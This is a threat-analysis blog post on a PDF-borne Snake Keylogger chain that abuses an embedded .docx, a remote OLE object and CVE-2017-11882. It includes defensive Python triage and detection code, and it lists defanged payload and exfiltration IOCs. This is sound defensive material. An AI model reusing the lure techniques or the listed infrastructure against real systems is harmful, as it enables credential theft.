PDF Documents Carrying Snake KeyLogger – Info Stealer


Microsoft Office files, especially Excel and Word documents, are the usual carriers for social engineering lures: the formats are familiar to the public, and the applications that open them are installed almost everywhere, so an attachment in one of these formats raises little suspicion.

Recently, HP's threat research team isolated a malware sample with an unusual infection chain that started from a PDF document rather than an Office file.

The threat actor relies on several techniques to evade detection: shellcode encryption, files embedded inside other documents, and an exploit hosted remotely rather than shipped in the attachment itself. Using a PDF as the initial carrier is out of the ordinary.

REMITTANCE.PDF

First, the PDF ("REMMITANCE INVOICE.pdf" in the IOC list below) is sent to the target as an e-mail attachment. If the target falls for it and opens the attachment, the document is downloaded and opened.

When the document is opened, Adobe Reader prompts the victim to open an embedded ".docx" file. The .docx has been cleverly named "has been verified. However PDF, jpeg, xlsx, .docx" so that, when Reader displays the filename inside its warning dialog, the text reads as part of the prompt itself and the victim is nudged into approving it.

Source: HP Research Blog

Analysis with Didier Stevens' "pdfid" script showed that the .docx is stored in the PDF as an Embedded File object. pdfid does not execute anything: it counts occurrences of PDF keywords that indicate potentially risky features, such as /EmbeddedFile, /JavaScript and /OpenAction, which gives a quick first read on what a document is able to do.

Source: HP Research Blog

To get at the embedded file itself, "pdf-parser" from the same toolbox is used. It can locate the object by number or keyword, decode its stream and write the extracted file to disk for further analysis.
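The two steps above, keyword triage and extraction of the embedded file, as an added example (not HP's code and not the page's tooling). It builds a constructed, uncompressed PDF whose only embedded file carries the decoy name from the IOC list, counts the keywords the way pdfid does, then follows the /Filespec reference to the /EmbeddedFile stream. The PDF structure, payload bytes and keyword list are assumptions; real samples often carry /FlateDecode streams and indirect /Length values, which this minimal parser does not handle and pdf-parser does.

```python
import re

# Constructed sample, not the real REMMITANCE INVOICE.pdf: the decoy filename is
# the one from the IOC list; the payload is a stand-in for the embedded .docx.
DECOY_NAME = b"has been verified. however pdf, jpeg, xlsx, .docx"
DECOY_PAYLOAD = b"PK\x03\x04 stand-in for the embedded .docx bytes"

# The subset of pdfid's keywords that matters for this sample.
KEYWORDS = (b"/EmbeddedFile", b"/Filespec", b"/OpenAction", b"/AA",
            b"/JS", b"/JavaScript", b"/Launch", b"/ObjStm")


def build_sample_pdf(name: bytes, payload: bytes) -> bytes:
    """Assemble a minimal, uncompressed PDF that carries one embedded file
    (Catalog -> /Names /EmbeddedFiles -> /Filespec -> /EmbeddedFile stream).
    No xref table is written: this is for exercising the parser, not viewing."""
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R /Names << /EmbeddedFiles "
        b"<< /Names [(" + name + b") 4 0 R] >> >> >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>",
        b"<< /Type /Filespec /F (" + name + b") /UF (" + name + b") /EF << /F 5 0 R >> >>",
        b"<< /Type /EmbeddedFile /Length %d >>\nstream\n" % len(payload)
        + payload + b"\nendstream",
    ]
    pdf = b"%PDF-1.7\n"
    for num, body in enumerate(objs, 1):
        pdf += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    return pdf + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


def count_keywords(pdf: bytes) -> dict:
    """pdfid-style tally. Each keyword must be followed by a non-name character,
    so /JS does not also hit /JavaScript and /EmbeddedFile does not hit /EmbeddedFiles."""
    return {kw.decode(): len(re.findall(re.escape(kw) + rb"(?![A-Za-z0-9])", pdf))
            for kw in KEYWORDS}


def iter_objects(pdf: bytes):
    """Yield (object number, body) for every 'N 0 obj ... endobj' in the file."""
    for m in re.finditer(rb"(\d+)\s+0\s+obj\s*(.*?)\s*endobj", pdf, re.S):
        yield int(m.group(1)), m.group(2)


def stream_data(body: bytes):
    """Return the raw stream bytes of an object using its direct /Length.
    Indirect lengths (/Length 6 0 R) and filtered streams are left to pdf-parser."""
    length = re.search(rb"/Length\s+(\d+)\b(?!\s+0\s+R)", body)
    start = re.search(rb"stream\r?\n", body)
    if not length or not start:
        return None
    return body[start.end(): start.end() + int(length.group(1))]


def extract_embedded_files(pdf: bytes) -> list:
    """Follow each /Filespec's /EF /F reference to its /EmbeddedFile stream."""
    objs = dict(iter_objects(pdf))
    found = []
    for body in objs.values():
        if not re.search(rb"/Type\s*/Filespec", body):
            continue
        name = re.search(rb"/F\s*\(([^)]*)\)", body)
        ref = re.search(rb"/EF\s*<<\s*/F\s+(\d+)\s+0\s+R", body)
        if not ref:
            continue
        target = objs.get(int(ref.group(1)), b"")
        filt = re.search(rb"/Filter\s*/(\w+)", target)
        found.append({
            "name": name.group(1).decode("latin-1") if name else None,
            "object": int(ref.group(1)),
            "filter": filt.group(1).decode() if filt else None,
            "data": stream_data(target),
        })
    return found


if __name__ == "__main__":
    sample = build_sample_pdf(DECOY_NAME, DECOY_PAYLOAD)
    for kw, n in count_keywords(sample).items():
        print(f"{kw:<14} {n}")
    for f in extract_embedded_files(sample):
        print(f"object {f['object']}: {f['name']!r}, filter={f['filter']}, "
              f"{len(f['data'])} bytes, magic={f['data'][:4]!r}")
```

The keyword count alone already tells the analyst that a one-page "invoice" has no business carrying an /EmbeddedFile; the extraction then hands over the .docx for the next stage of analysis without ever opening the PDF in a viewer.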

When the .docx file is opened, it fetches an .rtf file from a web server. Because a Word document in OOXML format is a ZIP archive, its contents can be unzipped and searched for URLs with the command shown in the image below.

Source: HP Research Blog

The URL highlighted in the image is not one of the schema URLs normally found in Office documents. It sits in the document.xml.rels file, which lists the document's relationships, and the relationship in question declares an external object linking and embedding (OLE) object that Word loads from this URL, as shown below.

Source: HP Research Blog
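The relationship check described above, as an added example that is not part of HP's write-up or tooling. It packs a constructed word/_rels/document.xml.rels into a minimal .docx, walks every .rels part in the archive for relationships with TargetMode="External", and separates the ordinary case (an external hyperlink) from the dangerous one (an external oleObject, which Word fetches and renders when the document is opened). The benign relationships and the example.com hyperlink are assumptions; the oleObject target is the defanged first-stage URL from the IOC list.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_TYPE_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Constructed word/_rels/document.xml.rels (not the original document's): the usual
# internal relationships, one benign external hyperlink, and one external OLE object
# whose Target is the defanged first-stage URL from the IOC list.
SAMPLE_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="{REL_TYPE_BASE}styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="{REL_TYPE_BASE}settings" Target="settings.xml"/>
  <Relationship Id="rId3" Type="{REL_TYPE_BASE}hyperlink" Target="https://example.com/" TargetMode="External"/>
  <Relationship Id="rId4" Type="{REL_TYPE_BASE}oleObject" Target="hxxps://vtaurl[.]com/IHytw" TargetMode="External"/>
</Relationships>
"""


def build_sample_docx() -> bytes:
    """Package the sample rels into a minimal OOXML zip (a .docx is just a zip)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/document.xml.rels", SAMPLE_RELS)
    return buf.getvalue()


def external_relationships(docx_bytes: bytes) -> list:
    """Walk every .rels part in the package and return the relationships whose
    TargetMode is External, i.e. content that Word fetches from outside the file."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for part in z.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(part))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                hits.append({
                    "part": part,
                    "id": rel.get("Id"),
                    "type": rel.get("Type", "").rsplit("/", 1)[-1],
                    "target": rel.get("Target"),
                })
    return hits


def remote_ole_objects(rels: list) -> list:
    """External hyperlinks are normal; an external oleObject is not. It makes Word
    pull an object from a URL as soon as the document is opened, which is how the
    .docx on this page retrieves f_document_shp.doc."""
    return [r for r in rels if r["type"] == "oleObject"]


if __name__ == "__main__":
    rels = external_relationships(build_sample_docx())
    flagged = remote_ole_objects(rels)
    for r in rels:
        label = "REMOTE OLE" if r in flagged else "external"
        print(f"{label:<11} {r['part']} {r['id']} {r['type']} -> {r['target']}")
```

Walking all .rels parts rather than only word/_rels/document.xml.rels matters in practice: the same external-object trick can be planted in a header, footer or embedded part, each of which has its own relationships file.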

Connecting to this URL leads to a redirect and then downloads a Rich Text Format document called f_document_shp.doc. For further analysis, rtfobj was used to check its contents for OLE objects.

EMBEDDED OLE OBJECTS

Source: HP Research Blog

As shown above, rtfobj finds two OLE objects, and the same tool can save them to disk. As rtfobj indicates, neither object is well-formed, so tools that expect a valid OLE structure can produce confusing results when run on them directly.

The objects were therefore saved in raw form and examined as the malformed objects they are. Inspecting their basics with oleid shows that they relate to Microsoft Equation Editor, a component of Word that attackers commonly abuse to run arbitrary code.

Examining the OLE object reveals shellcode that exploits CVE-2017-11882, a remote code execution vulnerability in Equation Editor.

The shellcode is stored in the OLENativeStream structure at the tail of the object. When it runs, it first uses a small routine to find its own location in memory, since it cannot know in advance at which address it will land.
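The rtfobj and oleid steps above, as an added example that is not HP's code. It decodes every \objdata destination in an RTF, parses the OLE1 object header that precedes the native data (OLEVersion, FormatID, ClassName, TopicName, ItemName, NativeDataSize), identifies Equation Editor objects by their ProgID (Equation.*), and reports when an object is not well-formed instead of failing on it. The sample RTF is constructed: one Equation.3 object whose native data is cut short and one object cut inside its header, echoing the two malformed objects rtfobj reported. The NativeData stub is a stand-in that only reproduces the compound-file magic; it is not the exploit object.

```python
import re
import struct

OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+)")

# Constructed stand-in for the object's NativeData (not the real exploit object):
# the real payload is a compound file, so it starts with the CFB magic D0 CF 11 E0.
NATIVE_STUB = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24


def lp_string(s: bytes) -> bytes:
    """LengthPrefixedAnsiString: DWORD length (incl. NUL) then the bytes and a NUL;
    an empty string is encoded as a zero length with no bytes."""
    return struct.pack("<I", len(s) + 1) + s + b"\x00" if s else struct.pack("<I", 0)


def ole1_blob(class_name: bytes, native: bytes) -> bytes:
    """Build an OLE1 EmbeddedObject stream as it appears hex-encoded in \\objdata:
    OLEVersion, FormatID=2 (embedded), ClassName, TopicName, ItemName, NativeDataSize, NativeData."""
    return (struct.pack("<II", 0x00000501, 0x00000002)
            + lp_string(class_name) + lp_string(b"") + lp_string(b"")
            + struct.pack("<I", len(native)) + native)


def parse_ole1(blob: bytes) -> dict:
    """Parse the OLE1 header; raise ValueError if the header itself is cut short."""
    pos = 0

    def u32():
        nonlocal pos
        if pos + 4 > len(blob):
            raise ValueError(f"header truncated at offset {pos}")
        value, = struct.unpack_from("<I", blob, pos)
        pos += 4
        return value

    def read_lp():
        nonlocal pos
        n = u32()
        if n == 0:
            return b""
        if pos + n > len(blob):
            raise ValueError(f"string of length {n} runs past end at offset {pos}")
        s = blob[pos:pos + n]
        pos += n
        return s.rstrip(b"\x00")

    hdr = {"ole_version": u32(), "format_id": u32()}
    hdr["class_name"] = read_lp().decode("latin-1")
    hdr["topic_name"] = read_lp().decode("latin-1")
    hdr["item_name"] = read_lp().decode("latin-1")
    if hdr["format_id"] != 2:
        raise ValueError(f"FormatID {hdr['format_id']:#x} is not an embedded object")
    hdr["native_size"] = u32()
    hdr["native_data"] = blob[pos:pos + hdr["native_size"]]
    # rtfobj's "not well-formed": the declared size is not what the blob actually holds
    hdr["well_formed"] = len(hdr["native_data"]) == hdr["native_size"]
    return hdr


def rtf_objects(rtf: bytes):
    """Yield (offset, decoded bytes) for every \\objdata destination in the RTF."""
    for m in OBJDATA_RE.finditer(rtf):
        hexdata = re.sub(rb"\s+", b"", m.group(1))
        if len(hexdata) % 2:          # dangling nibble: drop it rather than fail
            hexdata = hexdata[:-1]
        yield m.start(), bytes.fromhex(hexdata.decode("ascii"))


def triage_rtf(rtf: bytes) -> list:
    """One record per object: class name, size bookkeeping, and whether it is an
    Equation Editor object (ProgID Equation.*), the component CVE-2017-11882 targets."""
    report = []
    for offset, blob in rtf_objects(rtf):
        entry = {"offset": offset, "size": len(blob)}
        try:
            hdr = parse_ole1(blob)
            entry.update(class_name=hdr["class_name"], native_size=hdr["native_size"],
                         native_magic=hdr["native_data"][:4], well_formed=hdr["well_formed"],
                         equation_editor=hdr["class_name"].startswith("Equation."))
        except ValueError as err:
            entry.update(class_name=None, well_formed=False, equation_editor=False, error=str(err))
        report.append(entry)
    return report


def build_sample_rtf() -> bytes:
    """Constructed RTF with two malformed objects: one Equation.3 object whose
    NativeData is cut short, and one cut inside the header."""
    def wrap(blob):
        return (b"{\\object\\objemb{\\*\\objclass Equation.3}{\\*\\objdata "
                + blob.hex().encode("ascii") + b"}}")
    truncated = ole1_blob(b"Equation.3", NATIVE_STUB)[:-16]
    cut_header = ole1_blob(b"Equation.3", b"")[:14]
    return b"{\\rtf1\\ansi " + wrap(truncated) + b"\\par " + wrap(cut_header) + b"}"


if __name__ == "__main__":
    for entry in triage_rtf(build_sample_rtf()):
        print(entry)
```

An Equation.* class name is a strong signal but not proof of exploitation on its own: confirming CVE-2017-11882 means going on to parse the Equation Native stream inside the native data and examining the record that the exploit overflows, which is the part this example stops short of.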

The shellcode then downloads an executable called fresh.exe, a Snake Keylogger build, writes it to the Public user directory and runs it via ShellExecuteExW. Snake Keylogger is an information stealer that comes with a builder, so threat actors can select and configure the features they want and different payloads end up with different capabilities.
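The execution and exfiltration steps described above are also what a SOC can detect, so here is an added detection example that is not part of HP's write-up. It runs three rules over constructed Sysmon-style JSON events (process creation and network connection, not real telemetry): any start of EQNEDT32.EXE, which Microsoft removed from Office in January 2018; any process whose parent is EQNEDT32.EXE; execution from the Public directory; and SMTP traffic from a process that is not a mail client. The paths, the benign events and the mail-client allowlist are assumptions. Note that Equation Editor is started through COM, so its own parent is svchost.exe rather than WINWORD.EXE; the rules key on EQNEDT32.EXE as the parent of the dropped file, not on Word as its parent.

```python
import json

# Constructed Sysmon-style events (not real telemetry) mirroring the chain on this
# page: Equation Editor is started via COM (parent svchost.exe), it writes and runs
# fresh.exe from the Public directory, and the stealer reports over SMTP.
# Paths, the benign events and the destination hostnames are assumptions,
# except the exfiltration host, which is the defanged IOC from this page.
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"EventID": 1, "Image": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
    {"EventID": 1, "Image": r"C:\Users\Public\fresh.exe",
     "ParentImage": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"},
    {"EventID": 3, "Image": r"C:\Users\Public\fresh.exe",
     "DestinationHostname": "mail.saadzakhary[.]com", "DestinationPort": 587},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 3, "Image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "DestinationHostname": "mail.example.com", "DestinationPort": 587},
])

SMTP_PORTS = {25, 465, 587}
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}   # assumed allowlist for this sample


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def load_jsonl(text: str) -> list:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect(events: list) -> list:
    """Return (rule, detail) tuples. Event ID 1 = process create, 3 = network connect."""
    alerts = []
    for ev in events:
        image = ev.get("Image", "")
        if ev.get("EventID") == 1:
            if basename(image) == "eqnedt32.exe":
                # Equation Editor was removed from Office in January 2018; a start is worth a look
                alerts.append(("equation_editor_started", image))
            if basename(ev.get("ParentImage", "")) == "eqnedt32.exe":
                alerts.append(("equation_editor_child_process", image))
            if "\\users\\public\\" in image.lower():
                alerts.append(("execution_from_public_dir", image))
        elif ev.get("EventID") == 3:
            if ev.get("DestinationPort") in SMTP_PORTS and basename(image) not in MAIL_CLIENTS:
                alerts.append(("smtp_from_non_mail_client",
                               f"{image} -> {ev.get('DestinationHostname')}:{ev.get('DestinationPort')}"))
    return alerts


if __name__ == "__main__":
    for rule, detail in detect(load_jsonl(SAMPLE_LOG)):
        print(f"{rule:<30} {detail}")
```

The first two rules catch this chain before any network activity; the SMTP rule is the fallback for Snake Keylogger builds that exfiltrate over mail rather than HTTP, and it needs the allowlist tuned to whatever mail clients are actually in use.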

INDICATORS OF COMPROMISE

REMMITANCE INVOICE.pdf (SHA-256): 05dc0792a89e18f5485d9127d2063b343cfd2a5d497c9b5df91dc687f9a1341d

has been verified. however pdf, jpeg, xlsx, .docx (SHA-256): 250d2cd13474133227c3199467a30f4e1e17de7c7c4190c4784e46ecf77e51fe

f_document_shp.doc (SHA-256): 165305d6744591b745661e93dc9feaea73ee0a8ce4dbe93fde8f76d0fc2f8c3f

f_document_shp.doc_object_00001707.raw (SHA-256): 297f318975256c22e5069d714dd42753b78b0a23e24266b9b67feb7352942962

Exploit shellcode (SHA-256): f1794bfabeae40abc925a14f4e9158b92616269ed9bcf9aff95d1c19fa79352e

fresh.exe (Snake Keylogger) (SHA-256): 20a3e59a047b8a05c7fd31b62ee57ed3510787a979a23ce1fde4996514fae803

External OLE reference URL: hxxps://vtaurl[.]com/IHytw

External OLE reference final URL: hxxp://192.227.196[.]211/tea_shipping/f_document_shp.doc

Snake Keylogger payload URL: hxxp://192.227.196[.]211/FRESH/fresh.exe

Snake Keylogger exfiltration via SMTP: mail.saadzakhary[.]com:587

By FirstHackersNews | May 23rd, 2022 | Compromised, Data Breach, Exploitation, IOC's, Malware, Microsoft, Targeted Attacks
